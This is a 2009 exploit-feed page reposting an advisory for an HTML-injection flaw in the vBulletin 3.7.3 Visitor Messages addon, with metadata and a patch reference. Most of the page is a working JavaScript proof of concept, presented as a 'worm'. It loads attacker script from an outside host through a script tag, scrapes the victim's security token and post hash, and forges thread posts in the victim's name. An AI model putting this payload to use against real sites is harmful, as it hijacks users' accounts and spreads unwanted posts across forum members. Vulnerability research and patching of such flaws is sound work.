|
Feeds -
Exploits
|
|
Written by Mx
|
|
Monday, 02 March 2009 22:41 |
vBulletin Visitor Messages Addon Comment Notification HTML Injection Vulnerability
-\\Bugtraq ID:
32387
-\\Class:
Input Validation Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Nov 20 2008 12:00AM
-\\Updated:
Mar 02 2009 06:27AM
-\\Credit:
Mx
-\\Vulnerable:
VBulletin VBulletin 3.7.3
-\\Not Vulnerable:
VBulletin VBulletin 3.7.4 PL1
-\\Discussion
vBulletin is prone to a HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
vBulletin 3.7.3 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
Attackers can use a browser to exploit this issue.
The following example exploit is available:
===============================================================
32387.js
^^^^^^^^^
/* -----------------------------
* Author = Mx
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software = vBulletin
* Addon = Visitor Messages
* Version = 3.7.3
* Attack = XSS/XSRF
- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
+ with the visitor messages addon (a clone of a social network wall/comment area).
- When posting XSS, the data is run through htmlentities(); before being displayed
+ to the general public/forum members. However, when posting a new message,
- a new notification is sent to the commentee. The commenter posts a XSS vector such as
+ <script src="http://www.example2.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
+ and I have included an example worm that makes the user post a new thread with your own
- specified subject and message.
* Enjoy. Greets to Zain, Ytcracker, and http://www.example.com which was the first subject
* of the attack method.
* ----------------------------- */
function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}
function getAXAH(url){
var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);
function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);
var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);
var subject = 'subject text';
var message = 'message text';
postAXAH('http://www.example.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');
}
}
}
}
function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);
function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
}
}
}
}
getAXAH('http://www.example.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://www.example.com/4um/newthread.php?do=newthread&f=5">');
-\\Solution
The vendor has released a patch to fix the issue. Please see the references for more information.
-\\References(s)
--vBulletin 3.7.4 PL1 Released
http://www.vbulletin.com/forum/showthread.php?t=29166 (VBulletin)
--vBulletin Homepage
http://www.vBulletin.co (vBulletin)
|
